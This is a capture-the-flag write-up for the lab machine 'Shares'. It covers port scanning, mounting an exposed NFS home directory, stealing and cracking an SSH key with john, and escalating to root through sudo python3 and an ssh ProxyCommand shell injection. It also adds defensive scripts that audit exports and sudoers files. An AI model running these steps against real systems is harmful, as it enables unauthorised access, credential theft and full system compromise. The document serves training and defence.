Shares
nmap
mkdir nmap
sudo rustscan -a 172.31.1.7 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
Enumeration
NFS is exposed on port 2049, and SSH is, unusually, listening on port 27853 instead of 22.

Looks like we can mount the home folder of user amir

We can mount it by executing the following
mkdir /tmp/amir
sudo mount -t nfs 172.31.1.7:/home/amir /tmp/amir
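The mount only works because the share was exported to any host. As an added example (not part of the original writeup), here is a small audit script a defender can run against /etc/exports to flag exports of that shape: a home directory exported at all, an export to every host, or the no_root_squash option. It assumes the standard exports syntax and, as nfsd does, treats an entry with no host part as an export to every host; the sample exports file is constructed, not taken from the lab machine.

```shell
#!/bin/sh
# Added example (not part of the original writeup): audit an /etc/exports
# file for the kind of NFS export that made this foothold possible.
# Assumptions: standard exports syntax "<path> <host>(<opts>) ...", and
# an entry with no host (just "(opts)") means every host, as nfsd treats it.
# Flags: a home directory exported at all, an export to any host, and
# the no_root_squash option (lets a remote root write root-owned files).

audit_exports() {
    awk '
        /^[ \t]*(#|$)/ { next }                 # skip comments and blank lines
        {
            path = $1
            for (i = 2; i <= NF; i++) {
                host = $i
                sub(/\(.*$/, "", host)          # part before "(" is the host
                opts = $i
                if (opts ~ /\(/) sub(/^[^(]*\(/, "", opts); else opts = ""
                sub(/\)$/, "", opts)            # drop the closing ")"
                if (host == "") host = "(any)"
                if (path ~ "^/home(/|$)")
                    printf "RISK home-dir-export %s -> %s\n", path, host
                if (host == "*" || host == "(any)")
                    printf "RISK any-host-export %s -> %s\n", path, host
                if (opts ~ /(^|,)no_root_squash(,|$)/)
                    printf "RISK no_root_squash %s -> %s\n", path, host
            }
        }
    ' "$1"
}

# Constructed sample exports file (not taken from the lab machine).
write_sample_exports() {
    cat > "$1" <<'EOF'
# constructed sample
/home/amir *(rw,sync,no_subtree_check)
/srv/share 10.0.0.0/24(ro,sync,root_squash)
/export/backup 10.0.0.5(rw,no_root_squash)
EOF
}

# Usage: sh audit_exports.sh --demo   (or: audit_exports /etc/exports)
if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp)
    write_sample_exports "$tmp"
    audit_exports "$tmp"
    rm -f "$tmp"
fi
```

On the constructed sample the script flags /home/amir twice (home directory, exported to every host) and /export/backup once (no_root_squash), and stays silent on the host-restricted, root-squashed /srv/share, which is what a home-directory export should look like if it has to exist at all.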
Digging through the mounted file system, you will find an SSH private key in the .ssh folder.

Copy id_rsa to your working directory and tighten its permissions, since ssh refuses a private key that is readable by others.
cp id_rsa ~/infosec/cyberseclabs/shares/amir_id_rsa
chmod 600 amir_id_rsa
The key is passphrase-protected, so we have to crack the passphrase with john.

ssh2john amir_id_rsa > amir_id_rsa.ssh2john
john amir_id_rsa.ssh2john -w=/opt/wordlist/rockyou.txt
After a few seconds, john gives you the passphrase.
Initial foothold
With the SSH key, its cracked passphrase, and the username amir (known from the exported home directory), we can log in to the SSH service on port 27853. Sweet :D

Privilege Escalation
Checking our sudo rights shows we can execute python3 as user amy.

We can leverage that to gain a shell as amy.

And as user amy, we can run ssh through sudo.

Now we can gain root by executing the following:
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
This works because ssh hands the ProxyCommand string to a shell, so the ";sh" after the empty command spawns a shell that inherits sudo's root privileges; "0<&2 1>&2" wires that shell's stdin and stdout to stderr, which ssh leaves attached to the terminal, and the hostname x is a dummy that is never connected to. In other words, a sudo rule for ssh is a sudo rule for a root shell.
Enjoy your root privilege. :D
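Both steps of the escalation came from sudo rules for binaries that can spawn a shell (python3, then ssh). As an added example (not part of the original writeup), here is an audit script a defender can run over a sudoers file to flag such rules. It assumes one rule per line in the usual "user host=(runas) [TAG:] cmd[, cmd...]" form, no aliases, and a fixed list of shell-capable binaries; the sample sudoers fragment is constructed, with its first two lines modelled on the python3 and ssh rights described above rather than copied from the machine.

```shell
#!/bin/sh
# Added example (not part of the original writeup): audit a sudoers file
# for rules that hand out a shell, like the python3 and ssh rules this
# box relied on. Assumptions: one rule per line in the usual
# "<user> <host>=(<runas>) [TAG:] <cmd>[, <cmd>...]" form, no aliases,
# and a fixed list of binaries known to be able to spawn a shell.

audit_sudoers() {
    awk '
        BEGIN {
            n = split("ssh python python2 python3 perl ruby vi vim less more man awk find bash sh", list, " ")
            for (i = 1; i <= n; i++) shellish[list[i]] = 1
        }
        /^[ \t]*(#|$)/ { next }                          # comments / blanks
        /^(Defaults|Cmnd_Alias|User_Alias|Host_Alias|Runas_Alias)/ { next }
        index($0, "=") == 0 { next }                     # not a user rule
        {
            user = $1
            spec = substr($0, index($0, "=") + 1)        # "(runas) TAG: cmds"
            runas = "root"                                # sudo default
            if (spec ~ /^[ \t]*\(/) {
                runas = spec
                sub(/^[ \t]*\(/, "", runas); sub(/\).*$/, "", runas)
                sub(/^[^)]*\)/, "", spec)
            }
            gsub(/[A-Z]+:[ \t]*/, "", spec)               # drop NOPASSWD: etc.
            m = split(spec, cmds, ",")
            for (j = 1; j <= m; j++) {
                cmd = cmds[j]
                gsub(/^[ \t]+|[ \t]+$/, "", cmd)
                split(cmd, parts, /[ \t]+/)
                base = parts[1]; sub(/.*\//, "", base)   # basename of the binary
                if (cmd == "ALL")
                    printf "RISK %s may run ANY command as %s\n", user, runas
                else if (base in shellish)
                    printf "RISK %s may run %s as %s (can spawn a shell)\n", user, parts[1], runas
            }
        }
    ' "$1"
}

# Constructed sudoers fragment; the first two rules mimic the python3 and
# ssh rights described in the writeup, the rest are made up for contrast.
write_sample_sudoers() {
    cat > "$1" <<'EOF'
# constructed sample
Defaults env_reset
amir ALL=(amy) NOPASSWD: /usr/bin/python3
amy ALL=(root) NOPASSWD: /usr/bin/ssh
%admin ALL=(ALL) ALL
carol ALL=(root) /usr/sbin/reboot, /usr/bin/id
EOF
}

# Usage: sh audit_sudoers.sh --demo   (or: audit_sudoers /etc/sudoers)
if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp)
    write_sample_sudoers "$tmp"
    audit_sudoers "$tmp"
    rm -f "$tmp"
fi
```

Run against the sample, it flags amir's python3 rule, amy's ssh rule and the %admin ALL rule, and ignores carol's reboot and id rules, which cannot be turned into a shell. The binary list is deliberately short; extend it with whatever your own sudoers grants, keeping in mind that any program that can execute a subcommand belongs on it.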
